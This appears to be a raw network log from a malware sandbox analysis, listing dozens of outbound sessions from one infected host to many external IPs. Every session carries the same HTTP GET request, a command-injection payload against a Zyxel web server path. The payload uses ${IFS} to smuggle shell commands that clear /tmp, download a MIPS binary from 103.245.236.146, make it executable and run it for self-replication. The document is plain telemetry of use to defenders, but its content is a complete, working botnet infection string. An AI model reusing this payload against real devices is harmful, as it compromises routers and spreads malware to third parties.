                                                        Jan 28, 2024 10:12:59.533345938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6033192.168.2.1435156212.254.71.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533377886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6034192.168.2.145161274.156.244.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533418894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6035192.168.2.1452252116.230.250.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533446074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6036192.168.2.143726434.110.190.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533524036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6037192.168.2.1434034112.123.245.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533564091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6038192.168.2.1451536191.156.238.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533608913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6039192.168.2.144410888.11.213.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533665895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6040192.168.2.145588242.143.132.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533757925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6041192.168.2.1443166146.141.159.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533790112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6042192.168.2.144163067.232.200.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533821106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6043192.168.2.1448968138.189.173.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533847094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6044192.168.2.1440818149.138.132.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533878088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6045192.168.2.1459294112.213.150.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533910990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6046192.168.2.1445454172.191.134.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533977985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6047192.168.2.1445830194.104.183.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.533987045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6048192.168.2.1436428109.187.175.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534035921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6049192.168.2.1453754182.111.101.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534065962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6050192.168.2.145420078.43.202.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534076929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6051192.168.2.14341649.190.10.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534121037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6052192.168.2.1438242167.0.144.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534183979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6053192.168.2.1445322104.39.143.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534198999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6054192.168.2.1451560181.100.97.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534239054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6055192.168.2.1443596115.254.230.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534291983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6056192.168.2.1446732103.126.113.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534332991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6057192.168.2.143522837.58.211.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534363985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6058192.168.2.1459018199.21.181.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534400940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6059192.168.2.1434678121.71.169.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534466982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6060192.168.2.1438482112.80.128.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534488916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6061192.168.2.1440520188.195.232.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534540892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6062192.168.2.143279487.143.27.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534573078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6063192.168.2.1442992187.185.178.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534621000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6064192.168.2.1450684184.83.182.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534665108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6065192.168.2.1441948156.16.21.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534693003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6066192.168.2.145952659.218.157.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534750938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6067192.168.2.1434534134.142.182.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534786940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6068192.168.2.1460740162.62.8.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534818888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6069192.168.2.1441060182.118.238.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534837961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6070192.168.2.1441742116.163.105.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534877062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6071192.168.2.145146897.245.41.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534914970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6072192.168.2.144008698.195.2.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534948111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6073192.168.2.1456010170.228.84.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.534996033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6074192.168.2.1436502219.186.2.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535022974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6075192.168.2.144632432.253.28.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535079002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6076192.168.2.144313084.244.191.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535114050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6077192.168.2.144005865.62.50.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535144091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6078192.168.2.1442856114.136.92.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535202026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6079192.168.2.1459740121.19.115.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535214901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6080192.168.2.1446516113.5.150.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535259962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6081192.168.2.143314452.185.118.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535307884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6082192.168.2.1448096151.89.120.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535345078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6083192.168.2.1447850164.180.48.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535389900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6084192.168.2.1449854174.191.152.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535413980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6085192.168.2.1456336178.203.148.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535453081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6086192.168.2.1441890212.66.64.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535480976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6087192.168.2.1448628119.175.74.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535510063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6088192.168.2.1451782143.218.187.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535573006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6089192.168.2.144162650.12.222.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535619974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6090192.168.2.144750246.92.52.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535651922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6091192.168.2.1457218137.71.245.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535685062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6092192.168.2.1446626213.32.45.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.535742044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6093192.168.2.144466019.180.58.8443
                                                        TimestampBytes transferredDirectionData
